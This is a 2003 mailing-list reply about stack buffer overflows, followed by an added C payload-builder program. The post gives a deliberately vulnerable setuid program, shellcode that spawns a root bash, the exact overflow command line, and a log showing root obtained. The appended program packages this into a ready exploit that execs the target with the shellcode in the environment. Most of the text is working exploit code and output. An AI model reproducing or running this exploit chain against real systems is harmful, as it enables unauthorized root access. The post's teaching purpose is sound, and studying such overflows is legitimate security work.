Re: controlling ebp/eip of a frame, does it always lead to possible code execution?
From: Steven Hill (steve_at_covertsystems.org)
Date: 09/19/03
- Previous message: Adam: "Re: OpenSSH Vulnerability"
- In reply to: Ingram: "controlling ebp/eip of a frame, does it always lead to possible code execution?"
- Next in thread: Fisch, Matthew: "RE: controlling ebp/eip of a frame, does it always lead to possible code execution?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Fri, 19 Sep 2003 16:00:12 +1000 (EST)
To: Ingram <Vail@gmx.net>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Thu, 18 Sep 2003, Ingram wrote:
> Hello,
>
> Again I have a little question about buffer overflows
> that I could not figure out by myself.
>
> If I can control what is written to ebp and eip, I thought
> that this would always be enough to execute shellcode,
> ...it seems not:
>
> >./exploit
> Segmentation fault (core dumped)
> >gdb ./myprog ./myprog.core
>
Ingram,
Try these sample exploit command-line statements; they
should help you better understand what you are trying to
achieve. Then, if you prefer, browse over the attached
exploit code.
[steve@covertsystems research]#cat > vuln.c << EOF
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/* Deliberately vulnerable: argv[1] is copied into a 1024-byte stack
 * buffer with no length check, so a longer argument runs over the
 * saved EBP and the saved EIP that sit above it. */
int main(int argc, char **argv)
{
    char buffer[1024];
    if(argc > 1)
        strcpy(buffer, argv[1]);
    return EXIT_SUCCESS;
}
EOF
[steve@covertsystems research]#cat > shell2string.c << EOF
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen() */
char shell[] =
//setreuid(0, 0);
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80"
//execve("/bin/bash", NULL)
"\x31\xc0\x50\x6a\x68\x68\x2f\x62\x61\x73"
"\x68\x2f\x62\x69\x6e\x89\xe3\x8d\x54\x24"
"\x0c\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80"
//exit(0);
//NB: the backslash before x31 is missing here, so the three bytes
//'x','3','1' are written literally instead of 0x31 (the od dump
//below shows them, and shell.txt is 48 bytes rather than 46). It
//does no harm, because execve() never returns on success.
"x31\xc0\xb0\x01\xcd\x80";
int main(void) {
    FILE *fp;
    size_t x;
    fp = fopen("shell.txt", "wb");
    if (fp == NULL) {
        perror("shell.txt");
        return EXIT_FAILURE;
    }
    /* strlen() is safe here only because the shellcode has no NUL bytes */
    for(x = 0; x < strlen(shell); x++)
        fprintf(fp, "%c", shell[x]);
    fclose(fp);
    return EXIT_SUCCESS;
}
EOF
[steve@covertsystems research]$ gcc shell2string.c
[steve@covertsystems research]$ ./a.out
[steve@covertsystems research]$ ls -l shell.txt ; wc -c shell.txt
-rw-rw-r-- 1 steve steve 48 Aug 7 18:32 shell.txt
48 shell.txt
[steve@covertsystems research]$ od -ch shell.txt
0000000 1 300 260 F 1 333 1 311 315 200 1 300 P j h h
c031 46b0 db31 c931 80cd c031 6a50 6868
0000020 / b a s h / b i n 211 343 215 T $ \f P
622f 7361 2f68 6962 896e 8de3 2454 500c
0000040 S 215 \f $ 260 \v 315 200 x 3 1 300 260 001 315 200
8d53 240c 0bb0 80cd 3378 c031 01b0 80cd
0000060
[steve@covertsystems research]# sudo gcc vuln.c -o vuln
[steve@covertsystems research]# sudo chown root.root vuln
[steve@covertsystems research]# sudo chmod 4755 vuln
[steve@covertsystems research]# ls -l vuln
-rwsr-xr-x 1 root root 11549 Aug 7 18:30 vuln
[steve@covertsystems research]$ export CODE=`cat shell.txt `
[steve@covertsystems research]$ echo 'main(){printf("%p\n",getenv("CODE"));}' > code.c ; gcc code.c -o code ; ./code ; rm -rf code*
0xbfffff84
[steve@covertsystems research]$ ./vuln `perl -e '{print "A" x 1036}';``printf "\x84\xff\xff\xbf";`
No value for $TERM and no -T specified
No value for $TERM and no -T specified
[root@covertsystems research]# id
uid=0(root) gid=500(steve) groups=500(steve)
[root@covertsystems research]#
Happy Hacking!...
1036 == 1024 + 8[padding] + 4[EBP] +4[EIP]
EIP shall point directly to the shellcode ENV address...
[steve@covertsystems research-1]$ gcc --version
gcc (GCC) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
--
---=[ Covert Systems Research ]=-----------------------------//
= www.covertsystems.org -
= Exploit Research & Development -
= Specializing in Linux & UNIX Systems -
--------------------------------------------=[ SolarIce ]=---//
--The more one reads & learns, the less the other person knows.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (GNU/Linux)
iD8DBQE/apt1+SI9HWArYE4RAkUZAJoDHN4zfMnIqeGohvvjG+rm/MKpzQCdHOqI
qd6e7QwZcCZVOrDuTHo/Hco=
=7uzm
-----END PGP SIGNATURE-----
- TEXT/PLAIN attachment: shell2string.c
- TEXT/PLAIN attachment: vuln-1.c
- TEXT/PLAIN attachment: exploit-1-1.c
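The command line in the message above builds the payload by hand. The C program below is an added example, not the exploit-1-1.c attachment or any other code from the post: it packs the same 1036 filler bytes and the little-endian return address into argv[1], and checks that neither the shellcode nor the address contains a NUL byte, since the strcpy() in vuln.c stops copying at the first one (an ordinary reason why a controlled EIP still ends in a segfault rather than a shell). The function names, the 'A' filler and the default address 0xbfffff84 are assumptions: the address is what the post's getenv() probe printed on the author's box and must be recomputed for any other environment. The shellcode is the post's, with the backslash that shell2string.c drops on the exit(0) stub restored. It assumes a 32-bit little-endian x86 target with an executable, non-randomized stack, as on the 2003 system in the post; on a kernel with stack randomization or a non-executable stack the same payload only crashes the target.

```c
/* Added example: payload builder for the vuln.c overflow shown above.
 * Not code from the original post or its attachments. Assumes x86
 * 32-bit little-endian, 1036 bytes from buffer[0] to the saved EIP. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>

/* The post's shellcode (setreuid(0,0); execve("/bin/bash"); exit(0)),
 * with the missing backslash on the exit stub restored: 46 bytes. */
static const unsigned char shellcode[] =
    "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80"
    "\x31\xc0\x50\x6a\x68\x68\x2f\x62\x61\x73"
    "\x68\x2f\x62\x69\x6e\x89\xe3\x8d\x54\x24"
    "\x0c\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80"
    "\x31\xc0\xb0\x01\xcd\x80";

/* Index of the first NUL within the first len bytes of p, or -1 if none.
 * strcpy() in vuln.c stops at the first NUL, so a NUL in the address
 * bytes truncates the copy before EIP is fully overwritten. */
int first_nul(const unsigned char *p, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (p[i] == 0)
            return (int)i;
    return -1;
}

/* Write padlen filler bytes ('A') followed by ret_addr in little-endian
 * order, NUL-terminated so it can be passed as argv[1]. Returns the
 * payload length (padlen + 4), or -1 if out is too small or the address
 * contains a NUL byte that strcpy() would cut the payload at. */
int build_payload(unsigned char *out, size_t outsz, size_t padlen, uint32_t ret_addr)
{
    unsigned char addr[4] = {
        (unsigned char)(ret_addr & 0xff),
        (unsigned char)((ret_addr >> 8) & 0xff),
        (unsigned char)((ret_addr >> 16) & 0xff),
        (unsigned char)((ret_addr >> 24) & 0xff),
    };
    if (first_nul(addr, 4) != -1)
        return -1;
    if (outsz < padlen + 4 + 1)
        return -1;
    memset(out, 'A', padlen);
    memcpy(out + padlen, addr, 4);
    out[padlen + 4] = 0;
    return (int)(padlen + 4);
}

/* 1 if strcpy() would copy the whole payload (no embedded NUL), else 0. */
int payload_ok(const unsigned char *payload, size_t len)
{
    return first_nul(payload, len) == -1;
}

int main(int argc, char **argv)
{
    unsigned char payload[2048];
    /* Default address is the author's probe result; pass another as argv[2]. */
    uint32_t addr = argc > 2 ? (uint32_t)strtoul(argv[2], NULL, 16) : 0xbfffff84u;
    int n = build_payload(payload, sizeof payload, 1036, addr);
    if (n < 0) {
        fprintf(stderr, "address %#x has a NUL byte; strcpy() would truncate the payload\n", addr);
        return EXIT_FAILURE;
    }
    if (argc > 1) {
        /* argv[1] is the path to the setuid vuln binary. The environment
         * holds only CODE, so where the shellcode lands differs from the
         * post's probe; rerun the probe under this same environment first. */
        char code[sizeof shellcode + 5];
        memcpy(code, "CODE=", 5);
        memcpy(code + 5, shellcode, sizeof shellcode);   /* includes the NUL */
        char *envp[] = { code, NULL };
        char *args[] = { argv[1], (char *)payload, NULL };
        execve(argv[1], args, envp);
        perror("execve");
        return EXIT_FAILURE;
    }
    printf("payload: %d bytes, EIP bytes: %02x %02x %02x %02x, shellcode %zu bytes, NUL-free: %s\n",
           n, payload[n - 4], payload[n - 3], payload[n - 2], payload[n - 1],
           sizeof shellcode - 1,
           first_nul(shellcode, sizeof shellcode - 1) == -1 ? "yes" : "no");
    return EXIT_SUCCESS;
}
```

Run with no arguments to print a summary of the payload; with the path to the setuid vuln binary as the first argument (and optionally a hex address as the second) it exec()s the target with CODE as its only environment variable. The NUL check is the part worth keeping: an address such as 0xbfff0084 is rejected because its 0x00 byte would end the strcpy() before EIP is overwritten, which is exactly the kind of case where "I control EBP and EIP in the debugger" does not turn into a shell.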